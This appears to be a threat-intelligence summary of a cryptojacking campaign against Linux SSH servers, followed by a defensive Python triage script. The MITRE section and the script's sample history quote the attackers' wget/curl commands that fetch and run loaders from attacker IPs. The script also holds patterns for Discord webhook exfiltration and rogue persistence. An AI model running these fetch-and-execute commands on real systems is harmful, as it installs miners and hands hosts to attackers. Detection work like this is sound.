How We Tracked a Threat Group Running an Active Cryptojacking Campaign

Bitdefender researchers uncovered a Romania-based threat group active since 2020 that primarily targets Linux machines with weak SSH credentials to deploy Monero mining malware, using a modular toolkit and obfuscated loaders. The operation relies on Discord webhooks for reporting and C2, a Golang-based SSH bruteforcer sold as a service, and multiple persistence mechanisms including systemd services, new users, and SSH keys, all while embedding miner configurations. #MexalzUS #93joshua #chernobyl #Discord #XMRig #Monero

Keypoints

  • Threat group is likely based in Romania and has targeted Linux devices with weak SSH credentials since at least 2020.
  • Attackers obfuscate Bash scripts by compiling them with shc and use Discord to report back data.
  • The kit includes masscan, zmap, and a Golang SSH bruteforcer distributed as a service, with a separate API key issued to each actor.
  • Initial access and propagation revolve around loader chains like .93joshua, with other loaders such as .purrple and .black.
  • Infection payloads are fetched from remote servers (e.g., 45.32.112.68) and install Monero miners using embedded XMRig configurations.
  • Persistence is achieved via new users with sudo access, SSH key additions, and a systemd service named myservice.

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The infection payload is downloaded from a remote server (e.g., “wget http://194[.]33[.]45[.]197:8080/chernobyl/chernobyl.sh; … sh chernobyl.sh chernobyl;”) – “The infection payload follows these simple steps:”
  • [T1059.004] Unix Shell – Commands are executed in SSH sessions to gather system info, e.g., “uname -a” and other shell probes – “The infection payload executed in the SSH sessions is: curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua … uname -a”
  • [T1027] Obfuscated/Compressed Files and Information – Loaders are obfuscated via shc – “loader(s) are obfuscated via shc.”
  • [T1071.001] Web Protocols – Discord is used as a C2/reporting channel via webhooks – “The loader relays it to the attacker using an HTTP POST to a Discord webhook.”
  • [T1046] Network Service Discovery – Reconnaissance includes identifying SSH servers via port scanning and banner grabbing – “reconnaissance: identifying SSH servers via port scanning and banner grabbing”
  • [T1110] Brute Force – A Golang-based brute-forcer (Diicot brute) is used to identify valid credentials – “identifying valid credentials via brute-force” and “Syntax: ./brute [ Port ] [ Key ] [ Routines ] [ IP File ] [ Timeout ]”
  • [T1543.003] Create or Modify System Process – Persistence via systemd service “myservice” that runs /usr/bin/sshd – “a systemd service called myservice which runs the /usr/bin/sshd script”

Indicators of Compromise

  • [SHA256] d73a1c77783712e67db71cbbaabd8f158bb531d23b74179cda8b8138ba15941e, ed2ae1f0729ef3a26c98b378b5f83e99741b34550fb5f16d60249405a3f0aa33
  • [File Name] .93joshua, .k4m3l0t, .black, .purrple
  • [Domain] mexalz.us, area17.mexalz.us
  • [IP] 45.32.112.68, 207.148.118.221
  • [URL] cdn.arhive.online, requests.arhive.online
  • [Archive/Archive File] jack.tar.gz, juanito.tar.gz
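As an added defender-side example (not code from the Bitdefender write-up), the following Python script turns the MITRE techniques list and the IoC list above into a host and log triage check: it matches constructed command-history, proxy and hash-list lines against the listed IPs, domains, file names and SHA256 hashes, flags requests to Discord webhook URLs (T1071.001), inspects a systemd unit for the myservice name or an ExecStart that points at an sshd outside /usr/sbin (T1543.003), and reports sudo/wheel members and authorized_keys entries missing from a known-good baseline. All sample inputs, user names, key strings and the webhook URL are constructed; the Discord webhook URL pattern is an assumption about that endpoint format.

```python
"""Host/log triage against the indicators summarised above (added example).

Sample inputs below are CONSTRUCTED; only the IoC values (IPs, domains, file
names, hashes, the 'myservice' unit) come from the summary.
"""
import re

# --- indicators from the summary (de-fanged values normalised) ---
IOC_IPS = {"45.32.112.68", "207.148.118.221", "194.33.45.197"}
IOC_DOMAINS = {"mexalz.us", "area17.mexalz.us", "cdn.arhive.online", "requests.arhive.online"}
IOC_FILENAMES = {".93joshua", ".k4m3l0t", ".black", ".purrple", ".sherifu",
                 "chernobyl.sh", "jack.tar.gz", "juanito.tar.gz"}
IOC_SHA256 = {"d73a1c77783712e67db71cbbaabd8f158bb531d23b74179cda8b8138ba15941e",
              "ed2ae1f0729ef3a26c98b378b5f83e99741b34550fb5f16d60249405a3f0aa33"}
# Assumption: Discord webhook URLs look like https://discord.com/api/webhooks/<id>/<token>
DISCORD_WEBHOOK = re.compile(r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def refang(s: str) -> str:
    """Turn '45[.]32[.]112[.]68' back into a plain dotted quad for matching."""
    return s.replace("[.]", ".")


def scan_text_lines(lines, source):
    """Match history / proxy / hash-list lines against the IoC sets and T1071.001."""
    findings = []
    for n, raw in enumerate(lines, 1):
        line = refang(raw)
        for ip in IP_RE.findall(line):
            if ip in IOC_IPS:
                findings.append((source, n, "ioc_ip", ip))
        for dom in IOC_DOMAINS:
            if dom in line:
                findings.append((source, n, "ioc_domain", dom))
        for fn in IOC_FILENAMES:  # whole-token match so '.black' does not hit '.blackhole'
            if re.search(r"(?<![\w.])" + re.escape(fn) + r"(?![\w.])", line):
                findings.append((source, n, "ioc_file", fn))
        for h in IOC_SHA256:
            if h in line.lower():
                findings.append((source, n, "ioc_sha256", h))
        if DISCORD_WEBHOOK.search(line):
            findings.append((source, n, "discord_webhook", "T1071.001"))
    return findings


def check_systemd_unit(unit_name, unit_text):
    """T1543.003: the known 'myservice' unit, or an ExecStart sshd outside /usr/sbin
    (distribution sshd binaries normally live at /usr/sbin/sshd)."""
    findings = []
    if unit_name == "myservice.service":
        findings.append(("systemd", unit_name, "known_service_name", "myservice"))
    m = re.search(r"^ExecStart=(\S+)", unit_text, re.M)
    if m and m.group(1).endswith("sshd") and not m.group(1).startswith("/usr/sbin/"):
        findings.append(("systemd", unit_name, "sshd_unusual_path", m.group(1)))
    return findings


def check_sudo_members(group_file_text, expected_admins):
    """New users with sudo: members of sudo/wheel that are not in the baseline."""
    unexpected = set()
    for line in group_file_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] in ("sudo", "wheel") and parts[3]:
            unexpected |= set(parts[3].split(",")) - set(expected_admins)
    return sorted(unexpected)


def check_authorized_keys(keys_text, known_keys):
    """SSH key additions: every authorized_keys line absent from the known-good set."""
    return [k.strip() for k in keys_text.splitlines() if k.strip() and k.strip() not in known_keys]


# --- constructed sample artefacts ---
SAMPLE_HISTORY = [
    "cd /tmp",
    "curl -O http://45[.]32[.]112[.]68/.sherifu/.93joshua",
    "uname -a",
    "wget http://194[.]33[.]45[.]197:8080/chernobyl/chernobyl.sh; sh chernobyl.sh chernobyl;",
    "ls -la",
]
SAMPLE_PROXY = [
    "2024-01-01T10:00:00Z CONNECT cdn.arhive.online:443 200",
    "2024-01-01T10:00:05Z POST https://discord.com/api/webhooks/123456789/CONSTRUCTEDTOKEN 204",
    "2024-01-01T10:00:09Z GET https://example.org/index.html 200",
]
SAMPLE_HASHES = ["d73a1c77783712e67db71cbbaabd8f158bb531d23b74179cda8b8138ba15941e  /tmp/.93joshua"]
SAMPLE_UNIT = "[Unit]\nDescription=My Service\n[Service]\nExecStart=/usr/bin/sshd\nRestart=always\n"
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:alice\nwheel:x:10:alice,newadmin\n"
KNOWN_KEYS = {"ssh-ed25519 AAAAC3constructedKeyA alice@laptop"}
SAMPLE_KEYS = "ssh-ed25519 AAAAC3constructedKeyA alice@laptop\nssh-rsa AAAAB3constructedKeyB unknown@host\n"


def run_triage():
    """Run every check over the constructed samples and return the findings."""
    return {
        "ioc_matches": scan_text_lines(SAMPLE_HISTORY, "history")
        + scan_text_lines(SAMPLE_PROXY, "proxy")
        + scan_text_lines(SAMPLE_HASHES, "hashes"),
        "systemd": check_systemd_unit("myservice.service", SAMPLE_UNIT),
        "unexpected_sudo": check_sudo_members(SAMPLE_GROUP, ["alice"]),
        "unknown_keys": check_authorized_keys(SAMPLE_KEYS, KNOWN_KEYS),
    }


if __name__ == "__main__":
    for section, items in run_triage().items():
        print(section)
        for item in items:
            print("  ", item)
```

On a real host the constructed lists would be replaced by the contents of shell history files, proxy or DNS logs, `sha256sum` output for files under /tmp and home directories, the unit files under /etc/systemd/system, /etc/group and each user's authorized_keys; the ExecStart check deliberately keys on the path rather than the service name so that a renamed unit with the same behaviour is still flagged.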

Read more: https://www.bitdefender.co.uk/blog/labs/how-we-tracked-a-threat-group-running-an-active-cryptojacking-campaign/